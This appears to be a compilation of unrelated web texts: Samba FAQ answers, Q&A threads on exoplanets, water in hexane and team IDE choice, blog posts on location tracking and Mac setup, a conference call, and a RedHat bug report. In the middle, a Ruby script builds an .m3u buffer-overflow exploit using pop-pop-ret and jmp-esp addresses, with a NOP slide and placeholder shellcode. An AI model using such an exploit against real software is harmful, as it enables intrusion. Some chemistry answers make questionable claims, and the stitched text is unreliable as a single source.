1e > type name registration? This name is registered by all browse masters in a domain or workgroup. The registration name type is known as the Browser Election Service. Master browsers register themselves with this name type so that DMBs can locate them to perform cross-subnet browse list updates. This name type is also used to initiate elections for Master Browsers. What is the significance of the guest account in smb.conf? This parameter specifies the default UNIX account to which MS Windows networking NULL session connections are mapped. The default name for the UNIX account used for this mapping is called nobody. If the UNIX/Linux system that is hosting Samba does not have a nobody account and an alternate mapping has not been specified, network browsing will not work at all. It should be noted that the guest account is essential to Samba operation. Either the operating system must have an account called nobody or there must be an entry in the smb.conf file with a valid UNIX account, such as guest account = ftp. Is it possible to reduce network broadcast activity with Samba-3? Yes, there are two ways to do this. The first involves use of WINS (See TOSHARG2, Chapter 9, Section 9.5, "WINS The Windows Inter-networking Name Server"); the alternate method involves disabling the use of NetBIOS over TCP/IP. This second method requires a correctly configured DNS server (see TOSHARG2, Chapter 9, Section 9.3, "Discussion"). The use of WINS reduces network broadcast traffic. The reduction is greatest when all network clients are configured to operate in Hybrid Mode. This can be effected through use of DHCP to set the NetBIOS node type to type 8 for all network clients. Additionally, it is beneficial to configure Samba to use name resolve order = wins host cast. Use of SMB without NetBIOS is possible only on Windows 200x/XP Professional clients and servers, as well as with Samba-3. Can I just use plain-text passwords with Samba? Yes, you can configure Samba to use plain-text passwords, though this does create a few problems. First, the use of /etc/passwd-based plain-text passwords requires that registry modifications be made on all MS Windows client machines to enable plain-text passwords support. This significantly diminishes the security of MS Windows client operation. Many network administrators are bitterly opposed to doing this. Second, Microsoft has not maintained plain-text password support since the default setting was made disabling this. When network connections are dropped by the client, it is not possible to re-establish the connection automatically. Users need to log off and then log on again. Plain-text password support may interfere with recent enhancements that are part of the Microsoft move toward a more secure computing environment. Samba-3 supports Microsoft encrypted passwords. Be advised not to reintroduce plain-text password handling. Just create user accounts by running smbpasswd -a 'username' It is not possible to add a user to the passdb backend database unless there is a UNIX system account for that user. On systems that run winbindd to access the Samba PDC/BDC to provide Windows user and group accounts, the idmap uid, idmap gid ranges set in the smb.conf file provide the local UID/GIDs needed for local identity management purposes. What parameter in the smb.conf file is used to enable the use of encrypted passwords? The parameter in the smb.conf file that controls this behavior is known as encrypt passwords. The default setting for this in Samba-3 is Yes (Enabled). Is it necessary to specify encrypt passwords = Yes when Samba-3 is configured as a domain member? No. This is the default behavior. Is it necessary to specify a guest account when Samba-3 is configured as a domain member server? Yes. This is a local function on the server. The default setting is to use the UNIX account nobody. If this account does not exist on the UNIX server, then it is necessary to provide a guest account = an_account, where an_account is a valid local UNIX user account.
OPCFW_CODE
Are there many single transits in the Kepler data, which might be exoplanets with a longer orbital period than the time they have been observed for transits? Can any conclusions be drawn about how common they are? Is there reason to believe that the outer solar system is a common configuration? I suppose that slow moving planets are hard to detect also with doppler measurements. Will the upcoming telescopes aimed at nearby stars be able to find 10+ AU orbital radius planets? There are many planets known which have orbits longer than the longest exoplanet orbital periods found by Kepler. These planets were discovered using the "doppler wobble" or radial velocity technique. The plot below (a few months out of date now) shows many planets orbiting with similar periods to Mars and Jupiter. The red points we discovered by transits (including Kepler planets), whilst the green were discovered by the doppler technique. The sensitivity of current observational doppler techniques (shown by the blue line) means that so long as we observe for a sufficiently long time (decades, in order to see an oscillation in the radial velocity), we will be able to detect Jupiter-like (or even a bit lower-mass) planets out to much longer periods. The frequency of planets in wider orbits is also probed well by surveys for gravitational microlensing. Single transit events cannot be securely identified as being caused by planets. I think there are a number of other possible causes, both astronomical and instrumental, that might also be to blame. Nevertheless I'm sure somebody will analyse these in some statistical way at some point to draw some inferences, but at the moment, the securest data are from the radial velocity technique. These show that the solar system is not necessarily unusual at all - there are plenty of stars that have Jupiter-sized objects in Jupiter-sized orbits. According to the review by Howard et al. (2013), from radial velocity surveys, about 10 per cent of G/K stars have a 0.3-10 Jupiter-mass planet in orbit between 0.03 and 3 au from the parent star and around 7% have a Jupiter-sized planet orbiting between 3 and 20 au. This latter number probably has a significant error bar at the moment, but it is consistent with the information from microlensing surveys (e.g. Gould et al. 2010). This latter paper has an interesting statistic in the abstract. they say that if all stars had a solar system like ours, they would have detected 18.2 "events" - 11.4 due to Jupiters, 6.4 due to Saturns and 0.5 Uranus/Neptunes; they would also have detected 6 "two-planet" events. In actual fact they detected 6 events, one of which was a two-planet event, and thus conclude that a broad-brush figure for the frequency of "solar system occurrence" is 1/6. I know of two groups working on counting the number of long period Jupiter's in Kepler data (based on finding one transit only), but I haven't seen any results yet. Radial Velocities are the best way to answer your question because of the much longer timebase of observations.
OPCFW_CODE
Just like every other Bob Dylan fan in the world, I have been endeavoring to determine exactly how many roads a man must walk down. To this end, I’ve been using passive location tracking for a few years now and have generated a fairly significant amount of data on my movements and travel. Mostly I’ve used Google Latitude, and enabled its optional history feature. Many people shudder at the privacy implications of this. Personally, I assume my cell phone providers have very similar data on hand already, if not with quite as much accuracy and precision. I’ve now started looking through the data to see how my movements have changed over time. One really stark difference between living in Seattle and living in Stockholm is my average furthest distance — on any given day how many miles away from home do I make it? Check it out. This a map of my movements in Seattle on Thursday, September 29, 2011: That was a fairly normal Thursday on which I went downtown for work, went back home, and then went out for drinks on Capitol Hill. One cool thing about having this data is that it helps spark your memory — I now remember that exact evening, who I was with, and some of the conversations that we were having. Location is an excellent trigger for that sort of thing. Anyway, you can see that the furthest I made it from home is 4.3 miles. Most of my days in Seattle seem to have a furthest distance figure of 4 to 6 miles. Now, here’s a map of my movements in Stockholm on this Wednesday, September 26, 2012: Again, a fairly normal Wednesday. I walked to the office, went to a show after work, and then walked home. The difference, though, is that the furthest I made it from home is only 0.997 miles. One mile instead of five miles. That’s a pretty significant difference. What makes it especially interesting for me is that I lived pretty centrally in Seattle and had a very enviable commute (15 minutes on the bus followed by 5 minutes on a bike). The same holds in Stockholm. I live fairly centrally and have a similarly short commute. But the difference is that in Stockholm a short commute is a 15-minute walk, rather than a 15-minute bus ride. This is the kind of thing you can enable when you build for density, and it’s the kind of thing I hope to see become more possible in Seattle as well. Some caveats here: Neither of these days were climbing days for me, so I didn’t make it to the climbing gym. If I look at climbing days, my distance from home in Seattle is about 6 miles. In Stockholm it’s either 2 or 4 miles depending on which gym. That’s definitely a less pronounced difference, but I think the theme still holds. Some neighborhoods in Seattle are fairly dense. On my stereotypical lazy Sundays spent in and around Wallingford, I often didn’t make it even 2 miles from home. I could walk to restaurants, the coffee shop, the beer shop and the pub without going even half a mile. But unlike in Stockholm, that half a mile isn’t dense enough to have many offices where a software engineer might be able to find employment. Rather, I had to go downtown for work. While I have a bunch of data points about myself and my movements, this whole thing is — at its heart — quite anecdotal. I’m sure there are people in Seattle who don’t usually have to go more than a mile from home. And I know there are people in Stockholm who live further out and have to commute a few miles. Anyway, just some data that I thought was interesting.
OPCFW_CODE
What would happen if I mixed a single water molecule in a beaker of hexane? What would happen if I mixed a single water molecule in a beaker of hexane? Would it sink or float? How about 2 water molecules? 3? Etc? In other words, how many water molecules does it take to be hydrogen bonding together to become more dense than hexane? This is a clever question because the molecular weight of water is only 18.01528 g/mol while the molecular weight of hexane is 86.17536 g/mol. Naturally, you would expect the lower mass to rest on top, but water has a higher density... and we all know that water will sink! But there are other forces at work. So, supposing that you neglect the fact that one molecule of water would be in a vapor-state, Google says the surface tension of Hexane @ 20 °C is 18.43 mN/m... so placing the water molecule ontop of the hexane would probably cause the molecule to float (like a feather on water). However, if you suberged the molecule it should dissolve (Google says that the solubility of water in hexane is 0.01% at 20°C). Now, once the saturation point of hexane has been met, such that one more single molecule of water would cause a change to occur, that change would probably result in a condensation and precipitation of the dissolved water, because the reality is, that the hexane will become super-saturated, such that the extra water molecule will cause many water molecules to fall out of solution. Understanding that you are transferring energy is key to understanding this. Consider pushing a ball over a hill, once the ball reaches the top and begins to fall, it falls into the valley. Once you push a boat to the tipping point, it falls to the bottom. So the number of molecules necessary for hydrogen bonding together to become more dense than hexane would be the number of water molecules dissolved at the maximum supersaturation point (maybe 0.0105%, +1 molecule) minus the number of molecules at the saturation point (0.01%) Now having a saturated solution, with water on the bottom of the container, adding another molecule of water would generally cause one of the other dissolved molecules to fall out solution (because there is an equilibrium... some of the water molecules at the bottom are dissolving, while others are falling out of solution). Need we consider Brownian motion here? I think supersaturation is a moot point because it is usually achieved by raising the temperature of a solvent to allow more solute to dissolve before allowing the solvent to cool slowly. For hexane at 20 °C, it would be as you pointed out 0.1%. Then if you add a single water molecule above that limit it would probably float to the top. However, once enough molecules are added (around 6 I think) to create a solvation shell around a single water molecule, then the density of that 7H2O complex would be higher than hexane and sink to the bottom. @nova Supersaturation is practically done like in the way that you described, but the solution would also supersaturate by delicately adding one molecule at a time. And again, they would all float due to surface tension... they would need to be physically pushed to submerge. Then they would be dissolved; then the hexane would force a bunch of the other molecules out of solution... like rain. Ok, good point. But my argument still stands for what happens once the supersaturated point is reached. Any addition molecules would begin to float up until enough amalgamate to create a sphere of hydration that would then sink. @nova They would not float. They are dissolved throughout the solution. At supersaturation, they would continue to be dissolved in solution. Adding one more would cause a cascade of many water molecules to condense and precipitate. It seems like you assume that water is not soluble in hexane at all. This is incorrect. It is not miscible, but solubility of water in hexane 0.01% at 20°C. That is 100 mg/L or 5.5 mM which is actually a decent amount of molecules. Distribution in liquid in a beaker will be the same at all heights. A good question would be "what is the distribution of water molecules on the walls of the beaker and in the volume?" Beaker walls can accomodate small amount of molecules. The extent of absorption is following Langmuir adsorption model. It can be ignored at high concentrations (mM of dissolved material), but starts playing a significant role when you go into nanomolar or picomolar range. At that concentrations the actual amount of material in solution is significantly smaller than calculated because of absorption. Suppose that you have a sealed beaker with some hexane liquid in it at room temperature. Now add one water molecule. The answer is obviously that the single water molecule will spend some time in the vapour phase and some dissolved in the hexane. Once the water molecule hits the liquid surface there is a chance that it will enter the liquid. If there is a strong interaction between the water and the liquid then the tendency will be to spend longer in the liquid than vapour. Hexane and water have a poor interaction, the hexane cannot effectively solvate a water molecule's dipole as it has no appreciable dipole itself and hence a small dielectric constant (relative permittivity)$^*$. The low dielectric solvent means that the electric filed of the water's dipole can spread out over many hexane molecules causing a positive interaction energy. Exactly how big is difficult to say. The water molecule can occasionally overcome any intermolecular interactions in the liquid phase as there is an exponential distribution of energies in all molecules at a finite temperature. This is given by the Boltzmann distribution. Thus a few molecules have far greater energy than the average ($3RT/2$) and eventually these molecules will impart some of their excess energy to the water molecule and it will be ejected into the vapour phase. These processes will continually repeat themselves. Now if we consider this from a thermodynamic viewpoint, we will have to assume numerous water molecules in the presence of the hexane. We need to calculate the free energy which consists of the enthalpy change $\Delta H$ and entropy change $\Delta S$ as in the formula $\Delta G=\Delta H -T\Delta S$. The enthalpy of water entering the hexane will probably be small and positive for reasons outlined above, but there is also an entropic factor. When two liquids are mixed the (ideal) entropy of mixing$^{**}$ is $\Delta S= RT(n_1ln(x_1)+n_2ln(x_2) )$ where $x_1$ is the mole fraction of water and $x_2$ that of hexane and $n_1$ and $n_2$ are the respective number of moles. As the solubility of water in hexane is low approx $10^{-2}$ molar, if not smaller, then the mole fraction of hexane can be approximated as 1 and $\Delta S= RTn_1ln(x_1)$ which evaluates to approx -1 kJ/mol. The enthalpic (heat) term can be shown to be $(n_1+n_2)x_1x_2w$ where $w$ is an energy term allowing for the interaction between solute-solute $\epsilon_{11}$, solvent-solvent and solute-solvent molecules, $w \approx 2\epsilon_{1,2}-\epsilon_{1,1}-\epsilon_{2,2} $ where $\epsilon$ represents an interaction energy. As the interaction between water and hexane is smaller than hexane-hexane interaction($\epsilon_{1,1}$) and water-water interactions, the interaction energy is positive. This means that the free energy for dissolving $\Delta G$ is going to be small and probably negative overall, and this means that the solubility is going to be small also. As the amount of water increases approaching the solubility limit there will be microscopic regions of pure water and pure hexane until the water separates and being the most dense of the two liquid forms the lower layer.In this situation water is dissolved in the hexane, to its solubility limit, and hexane also in water. The extent of solubility is given by Henry's law. The vapour pressure P of a solute above a solution is given by $P= k_Hx$ where x is the solute mole fraction and $k_H$ the Henry Law constant which is only determined by experimental and depends on solute/solvent and temperature. Values of $k_H$ (in units of Bar) are several thousands for relatively insoluble solutes such as water in hexane or vice versa. $^*$ A low dielectric constant $\epsilon _0$ means that an electric field spreads a considerable distance r from its source compared to a solvent with a high constant. The interaction energy scales as $\approx 1/(\epsilon _0 r)$, low dielectric (alkane) solvents have $\epsilon _0$ in the range 2-4, whereas water is 78 so the effect is considerable. $**$ Entropy is defined from statistical thermodynamics as $S=k_Bln(\Omega)$ , where $k_B$ is the Boltzmann constant and $\Omega$ the number of configurations available to the system. The calculation of the entropy starts by working out the number of ways of placing molecules into sites. Suppose that there are N1 and N2 molecules and that they can occupy in total N1+N2 sites. There is a chance of putting the first molecule into N1+N2 sites , the second in N1+N2-1 sites etc. The total number of possibilities is (N1+N2)!. However, molecules of one type cannot be distinguished from one another thus we must divide by N1! and similarly for N2 by N2!. This produces $\Omega=\frac{(N1+N2)!}{N1!N2!}$. Using Sterling's approximation for factorials the equation for $\Delta S$ can be obtained. This is the answer to the previous version of the question with ethane instead of hexane. Ethane is a gas, did you mean ethane? Assume that your beaker is sealed but in thermal contact with the outside. i.e. sitting on the bench. On adding a single water molecule the thermal energy of the ethane will impart its energy to the water and it will be found in the gas phase. If you keep adding water the same thing happens but eventually liquid water will form at the bottom/sides of the container in equilibrium with water vapour; rate of evaporation equal to rate of condensation. Adding more water will allow more ethane to dissolve as the water volume and gas pressure increases in the container (as it is sealed). Some small amount of the ethane will also dissolve in the water. The amount is determined by Henry's law. Changed ethane to hexane. Typo.
STACK_EXCHANGE
Interactive Tools and Demos Call for Participation as part of the 2019 CSCL Conference Interactive Tools and Demos Track: Description and Objectives - Karim Sehaba (University of Lyon 2, France) - Yannis Dimitriadis (University of Valladolid, Spain) - Pierre-Antoine Champin (University of Lyon 1, France) Interactive tools and demos are intended to enable participants to experiment with new interactive devices and environments for teaching and learning, explore designs for collaborative activities, or to try out and compare methods for research and practice. Submissions should preferably cohere with the conference theme “4E learning: Combining Embodied, Enactive, Extended, and Embedded Learning in Collaborative Settings”. See the main submission page for a description Submissions may be of two types: Classic Interactive Demo and Special Interactive Session. The Classic Interactive Demo is targeted at two groups. The first are researcher developers who would like to showcase their interactive tools, get feedback, and find collaborators with whom to develop projects. The second group are researchers who would like to demo applications of existing technologies in specific CSCL contexts. In this category of classic interactive demos, the chosen submissions will be given space during the poster sessions. Interactive tools that speak in some way to the 4E theme will be given priority. The Special Interactive Session is also targeted at the same two groups as above, but the objective is different. We plan to build a special session from the submissions, that will have a extra slot in the program, and where participants will discuss the extent to which a particular tool or tool-based method has a built-in underlying theoretical stance, and what the consequences of such a stance are. How do epistemological positions regarding learning and collaboration influence tool design? How does the vision of the role the individual plays in the group influence tool design? What does harmonizing a tool’s development with a theoretical approach or an epistemological position bring to a research program? And on the contrary, to what extent can a tool be theory free? Alternatively, can the same tool or tool-based method function with different underlying theories? What are the advantages for such a research program? Finally, what are advantages of pragmatic approaches that are driven by new technological possibilities? The number of Special interactive demos we accept for showcasing during the poster sessions will be limited by submission quality and available physical space. We intend to accept four submissions for the special session for which contributors take position regarding the questions above. The idea is to organize three consecutive time periods within the session 1) presentations of position statements, 2) interactive work with the four demos, 3) and general discussion, potentially geared towards publishing in IJCSCL. Please direct any questions to the Interactive Tools and Demos co-chairs at (firstname.lastname@example.org Please submit a short paper (not to exceed 4 pages) here. It should follow the current version of the ISLS author guidelines (there is also a Microsoft Word template The abstract should note whether you are submitting to the classic or special interactive session (see above). The paper should be written with the reader of the conference proceedings in mind who may be reading the description after the event has taken place. The structure of the 4 pages is flexible, but it is suggested that the submission describe the concept, motivations, and significance for CSCL and in particular for the 4E Learning theme: Combining Embodied, Enactive, Extended, and Embedded Learning in Collaborative Settings. In both cases, (classic interactive demo or special interactive session), include a description of your technological setup. If your submission is accepted, and you need specific equipment that you cannot bring with you, contact the co-chairs at email@example.com as soon as possible in order to see how this can be organized. If you are submitting to the special interactive session, then you should take position on the statements above, in the section entitled The Special Interactive Session. Important Dates for Interactive Tools and Demos January 15, 2019 – Applications due (https://new.precisionconference.com/cscl February 28, 2019 – Notification of acceptance March 15, 2019 – Submission of the final 4-page summary for publication in conference proceedings
OPCFW_CODE
#!/usr/bin/env ruby require 'rainbow' =begin We know that we need 26094 bytes before overwriting EIP, and that we need 4 more bytes before we are at the stack address where ESP points at (in my case, this is 0x000ff730). We will simulate that at ESP+8, we have an address that points to the shellcode. (in fact, we’ll just put the shellcode behind it – again, this is just a testcase). 26094 A’s, 4 XXXX’s (to end up where ESP points at), then a break, 7 NOP’s, a break, and more NOP’s. Let’s pretend the shellcode begins at the second break. The goal is to make a jump over the first break, straight to the second break which is at ESP+8 bytes = "0x000FFD38". To get the value of ESP+8 into EIP (and to craft this value so it jumps to the shellcode) I will use the pop pop ret technique + address of jmp esp !!! =end begin file = "pop_pop_ret.m3u" x = "A" * 26064 + # misc junk eip = [0x01b56a10].pack('V') + # pop pop ret from MSRMfilter01.dll jmp_esp = [0x01CCF23A].pack('V') + # jmp esp append_esp = "XXXX" + # add 4 bytes so ESP points to the beginning of our shellcode | 000FFD34 58585858 XXXX hellcode = "\x90" * 8 + # add 8 NOP slide bytes shellcode = "\xcc" + "\x90" * 500 # real shellcode textfile = open(file , 'w') textfile.write(x) textfile.close() puts puts " pop_pop_ret.m3u file created!\n\n\n".foreground(:red).bright.blink end
STACK_EDU
I have been running RedHat 6.0 for a number of months. Last week I applied a number of security and recommended patches to my system. I obtained those patches from the RedHat web site. Among those patches was the full suite of Xfree86 3.3.5 rpm's. (I also applied Gnome, CDE, netkit, termcap, rpm, telnet, traceroute patches. I can provide a full Starting on the weekend, my system starting logging SCSI errors of the form: Oct 5 04:02:47 willow kernel: SCSI host 0 abort (pid 142691) timed out - resetting Oct 5 04:02:47 willow kernel: SCSI bus is being reset for host 0 channel 0. One symptom for me seems to be that StarOffice has twice now locked up completely. The process is defunct, and not killable. I rebooted once, and ended up having to manually fsck to clean up the disk. The reason I suspect Xfree86 is that I when looking through deja.com and found several posting by Randall J. Parr (one in comp.os.linux.x under the title "bug/conflicts in XFree86 3.3.5 on RH6?" dated Sep 23/1999) He detailed quite well an almost identical situation, only he had done a better job of tracking it down to XFree86. His solution was to downgrade to version 3.3.3. I emailed him and he replied that he has not received a single other response to his several usenet postings. I thought I should try submitting an official bug report, in case this really is something new to you guys. I checked what I could on the redhat support pages and couldn't find For completenes, I have a Intel PII-350, ASUS-P2B motherbd, Adaptec 2940UW scsi card, Yamaha crw4416 cd-rw, and seagate ST34520W SCSI hard disk. the other system hardware should be irrelevant, but to cover everything, the video card is an 8MB AGP ati xpert98. Uname -a reports kernel version 2.2.5-22 #1. thank you for your attention. this is a symptom of faulty hardware, not of bad software. There is NO WAY that XFree86 can cause bad interactions with the SCSI bus. Maybe your hard drive is
OPCFW_CODE
New mac, hu dis? 😉 I left Microsoft and started at the new gig a little under two months ago where they handed me a MacBook to work on. Now, while I've used MacOS in the past, my 2014 MacBook Pro has been running Windows for the past eight years so I had to get my bearings and relearn a few things. Going back and forth between the OSes wasn't fun either. So, to me, the decision here was a no-brainer: aging desktop and laptop machines that are long overdue for a refresh, M-series chips being as good as they are, and being tired of having to maintain an at-home and on-the-go setup.. it was time to switch my personal computing life to MacOS by picking up a MacBook Pro. This page has some of the apps I've got running and settings tweaks I've made on my machine to help make that transition a bit easier. If you have any tips or tricks of your own, or suggestions for things I should check out, then hit me up on Threads: @shaykalyan! 14" MacBook Pro with the baseline M2 Pro, 32GB of RAM, and a 512GB SSD for storage. I also grabbed a Caldigit TS3 Plus dock to plug in my monitors and peripherals, which makes it a super easy swap of a USB-C connection between my work machine and my personal. Outside of the typical programs we'd all be installing, like your favourite web browser, these are some apps that I'm finding to be essential on MacOS. - Rectangle app: window snapping/tiling. A pro tip is here to set up shortcuts similar to Windows, e.g., CTRL + ⌘ + <arrow key>for left, right, and maximizing of windows. - TextPal: emojis at your fingertips! This has autocomplete prompting with a shortcut of your choosing to activate, e.g., - Shottr: powered-up screenshots and annotating. The built-in screen capture support is fine, but this lets you perform markup and other edits pretty easily, and have it all go straight to your clipboard— zero faff. - Kap: easy video capture and processing of them out to gifs. - Maccy: clipboard manager. There are quite a few options out there, but I find this to have the least intrusive UX. It also has support for pinned (permanent) items and non-text content like images. - Flow: a simple and effective menu bar based pomodoro timer. - Hidden Bar: simple app to hide the overflow of icons along the menu bar. If you need more control/flexibility, there's also the paid Bartender app. - Itsycal: cute little monthly calender in your menu bar and shows upcoming events. I've synced my Google calendar with the built-in calender app for it to all show up effortlessly on this! - Meeting Bar: integrates with calendar and meeting services like Zoom to be able to see your upcoming meetings and launch right into them with one click. - Aerial: beautiful screensavers like what you'd get on Apple TV. Though the latest MacOS Sonoma is meant to bring some of that natively! - AlDente: a battery charge limiter app that lets you set a charge limit, e.g., 70%, after which the laptop will use the power supply. I find it especially important for my case where I'll primarily be using my laptop docked at home and want to maintain its battery capacity and health for as long as possible. MacOS does have an option to limit the charge at 80%, but it only goes into effect after it "learns" from your usage, and for some people that never ends up working! There's enough discourse online around whether apps like this one is necessary, and from what I've read, it seems to work as advertised for keeping battery cycles low and overall health high, e.g., Reddit discussion one and Reddit discussion two. Lots of out of the box defaults that don't jive with me. - Sharing > Make sure all sharing is disabled and update the computer name - Show scroll bars: - Battery > Show Percentage: Display and Dock - Automatically hide and show Dock: - Default web browser: - Show recent applications in dock: - Keyboard navigation: - Keyboard Shortcuts > App Shortcuts > All Applications > type in Emoji & Symbolsin the input box and pick your shortcut, e.g., ⌘ + .to pop up the emoji panel! - Input Sources > Edit > Capitalize words automatically: - Input Sources > Edit > Add period with double-space: - Input Sources > Edit > Use smart quotes and dashes: - Input Sources > Edit > Use "for double quotes - Input Sources > Edit > Use 'for single quotes - Point & Click > Secondary click: Click or Tap with two fingers - Point & Click > Tap to click: - Scroll & Zoom > Smart zoom: Disable(removes the lag on the two finger secondary click!) - More Gestures > App Exposé: Swipe down with Three Fingers - More Gestures > Launchpad: Some minor tweaks here: - General > set home directory as default - Tags > disable these to remove clutter As for moving around the directories, these shortcuts are handy to know: ⌘ + Shift + G: Navigate to a path ⌘ + Option + C: Copy an item's path to clipboard - You can also hold the Optionkey while looking at the context menu ("right click") of an item in Finder to reveal alternative selections, including having the Copy <item> as Pathname Enable the app switcher on all displays instead of only showing it on the screen where the dock was last used (source link) defaults write com.apple.dock appswitcher-all-displays -bool true Enable repeated keys on press and hold, instead of accessing symbol/accented characters (source link) # global setting or a specific app, then restart the machine/app defaults write -g ApplePressAndHoldEnabled -bool false # defaults write <com.company.app> ApplePressAndHoldEnabled -bool false There's already a lot of good info out there for developer tooling and apps, but I'll quickly jot a couple of things down here for future me. iTerm2, a terminal alternative. I set this up Quake-like with a hotkey to bring up the terminal as an overlay at the top of the screen: - Appearance > General > Exclude from Dock and ⌘ + Tab Application Switcher: - Appearance > Tabs > Show tab bar even when there is only one tab: - Profiles > [Your profile] > Window > Style: Full-width Top of Screen - Profiles > [Your profile] > Keys > Key Mappings > Presets: Natural Text Editing - Keys > Hotkey > Show/hide all windows with a system-wide hotkey: - Keys > Hotkey > Hotkey: SHIFT ⌘ ` brew install git brew install --cask git-credential-manager brew install --cask sublime-text brew install --cask visual-studio-code I'm sure my setup with evolve over time so I'll try and keep this page updated over the next little while! 2023/10/15: Added note on disabling Smart zoom
OPCFW_CODE
Should every member of a team use the same IDE? Do you think it makes sense to enforce that every member of a team must use the same IDE? For instance all engineers that are already on the team use IDE X. Two new engineers come and want to use IDE Y instead because that's what they have been using for several years now. Do you have any experience with "mixed IDE" teams? If so what is it? The problem I've often had with mixed-editor environments is auto-formatting of code and treatment of things like tabs. As long as you get all that straight, it won't matter much. Provided the 'official' build system (as used by the Continuous Build servers) is the same for all, I don't see any reason why each member of the team could not choose the tools he wants... I'd add that if the official build system depend on an IDE, there is a problem. At the place I work, about 25% of the people use Visual Studio, 50% use an internally developed IDE, and the last 25% don't use an IDE at all, preferring use use Notepad++, Vim, or Emacs. This has never been a problem, so long as everyone builds the same way. When you spend a lot of time at other team member's desks it can be annoying figuring out their setup before you can help them. OMG!!! An internally developed IDE ??? That is a recipe for a disaster, like an internally developed bug tracking system. @Job, I work at Microsoft, so strictly speaking VS is also an internally developed IDE. We also use an internally developed bug tracking systems... TFS and Product Studio :). It's fine as long as everyone can support themselves. If you're the only person on your team who uses XYZ and you're having a problem nobody else is (or worse, everyone else has problems with files you check in), you need to be able to fix the problem on your own. @JSBձոգչ TFS... that is a recipe for disaster ;) If your team relies on certain plugins available only to certain IDEs, then it only makes sense to unify everyone under the same development platform. I also find it easier to help someone with a development issue if they have the same IDE as me, whereas if I'm to read someones screen with an unfamiliar interface it'll take a bit longer. If your team relies on an IDE plugin for anything non-trivial, you already have bigger issues. @HedgeMage Only a sith deals in absolutes. E.g. what if the project is based on Eclipse Platform? I don't know what is the current state, but a couple years ago IntelliJ was incapable to do sophisticated validation and such for Eclipse plugin metadata. We had a developer on team who insisted on IntelliJ - more then once checking in broken code. One downside is that when pairing you can't swap the keyboard between you as fluently. Between mainstream IDEs this is probably not a huge problem, but if one person is used to Eclipse while the other is used to vim, there is going to be a mismatch. The Eclipse user may well be entirely unable to use vim, while the vim user (that's me ;) spends a lot of time cursing under their breath at the horrible slowness of using vanilla Eclipse. That said, I'd still much rather use vim myself. Provided your pair are happy with just one of you "driving" for extended periods it works OK. And I know there are plugins to make Eclipse work like vi, but I'm talking about pairing where I go and sit with someone who has Eclipse working as they like it, so they won't be installing that plugin. It would make no sense at all to force every developer of Linux kernel to use the same IDE (or use any IDE at all). I don't have experience with mixed IDEs, unless you count a commercial IDE with occasional supplementing by a text editor "multiple IDEs," but I can think of a couple pros and cons. Pros Each developer can be most productive with what they know best Some IDEs may provide an advantage over others (one might be better at refactoring, another might be better at providing coding aids, others might be better with data integration, whatever). Using a blend might allow your team to capitalize on that. You'll have a bit of a hedge against the possibility that one of the IDEs goes defunct. Cons Licensing issues. If there are multiple commercial IDEs involved, maybe it's more expensive. At the least, it could be more to keep track of. Licensing issues 2. If there are frameworks or plug-ins that are licensed by IDE or langauge, will this be a problem? As Dszordan mentioned, certain plug ins may not be compatible with the different IDEs. If the IDEs have code generation components or style formatting engines that do things differently, this might cause some confusion. Today's developer wants to choose their own tools This has changed over time though. 10 or 15 years ago there wasn't as many choices at places where I've worked. (yes there were lots of editors but they weren't a 'choice'). The shop that I worked at 15 years ago was very 'old school' (even then!) and vi was the editor. No choice. This was actually pretty useful, because after the first month of cussing and swearing I actually got to like it. Today, there are many choices and each has many advantages. In my personal experience I used an IDE - rubyMine - for a couple of years before switching 'back' to vi(m). I did this because Ruby is a very hard language to write an IDE for (duck typing and other dynamic features) and as a result IDE's tend to be slow and/or require the latest, fastest machine. There is a reason for which this can be forced. Simply consider visual studio and emacs/vim. As on windows visual studio will add an extra \r at the end of the line. This mess up with the display in emacs/vim. Also the tabs create problem. The problem with us is that we developers work in Linux but our software architect is comfortable in visual studio. He once cursed us saying that we do not format the file properly. But then when he found that this is because of the default setting issue, we all agreed to the same format. If anyone force me to use particular IDE, I will not feel bad. Whatever is good for the team I will respect that and will compromise accordingly. You are confusing code formatting standard with IDE usage. If you decide to use 3 spaces for your indentation level, you can set that in Visual Studio or Emacs (I know, I use them both). Other issues such as the different line endings in Windows, Macs, and Unix could be solved by custom check-in/check-out scripts, ala if OS == Windoze ... Switching IDE because you don't know how to set spaces/tab in the one you are using is unfortunate. Also a boss cursing you without knowledge is not a good thing. This feels more like an anecdote than an answer though. The opening sentence doesn't make sense to me other than essentially saying that ignorance of settings might be a reason. Note also that this is from 2010 Things have changed in 11 years. I don't think everyone needs to have the "same" IDE, but it would be nice that everyone had a "supported" IDE. For example, if your IDE is integrated into the code review process as far as commenting and updating code goes, then it would make sense for everyone to be on a supported platform. If your company is using a collaborative environment such as Rational Team Concert and one or two guys want to use an unsupported IDE (or a different version) while everyone else uses compatible ones, then life may be difficult for the people who have chosen to be outside of the support loop. If everyone wants to, that's fine, but different people might want to use different editors/IDEs. I wouldn't really want people to force me to use an editor other than my preferred one if I were working on something big with a team, and I doubt I'm alone. People may be most happy with the situation if you don't force them to use a particular editor. BTW, Emacs! Well yes I have some experiecne in that regards being a part of mixed windows/unix & c++/java team. I think this is not an issue provided either everyone is comfortable working with the other IDE or there is never going to be a situation when anyone who is not familiar with IDE Y needs to work on the other guy's (that is the guy with IDE Y) system. At our place we build our projects using Visual Studio. When it comes to editing text I switch to Emacs. Your company shouldn't care as long as the work is done. Sounds a bit like "we used this at my old job". Well, they aren't at their old job. If it doesn't affect your tool chain or source control plug.ins, then maybe yes. Then again, can the two new folk demonstrate a clear benefit? Have they used your IDE? Otherwise, I have no patience with this nonsense unless there is a good case for it. They aren't at their old job: it couldn't have been that good for them to want to leave. Was using the other IDE the only highlight in ther old job: if so, they should STFU and be grateful.. Shouldn't peoples preferences matter to a workplace? Is preference nonsense? Isn't a programmers satisfaction a benefit to the company? I am sorry but this doesn't "compile" for me. @daramarak: Where does this cross into arrogance or being a prima donna, especially for larger shops with a corporate standard? Remember: new guys walking into a new company saying "we want this" is arrogance. YES! Enforce singleton IDE. It makes problems when the project dependency change. if one introduce a new dependency to the project, then every one will waste time to introduce that new dependency, and some might fail and waste time on that process. HUGE WASTE OF TIME. there should be a REALLY good justification to add a different IDE to the team, meaning the saved time should surpass the time dedicated to migrate the system to different IDEs An IDE is really an editor. In no way does an editor constitute a project dependency. (I'm aware that this answer may have been sarcastic, however, this is not the place for sarcasm) IDE is not really an editor, because you don't use "Notepad.exe". you need extra work done by IDE, and ide does not have standards, which makes things difficult to use the external ability. and if you ment that hex edit is just "text editor" then code is not just text. The IDE really is just an editor, with a bunch of other tools, the vast majority of which can be called on the command line anyway. i don't get people here. they say an internal ide is bad, and uniform ide is bad. so ide should be uniform 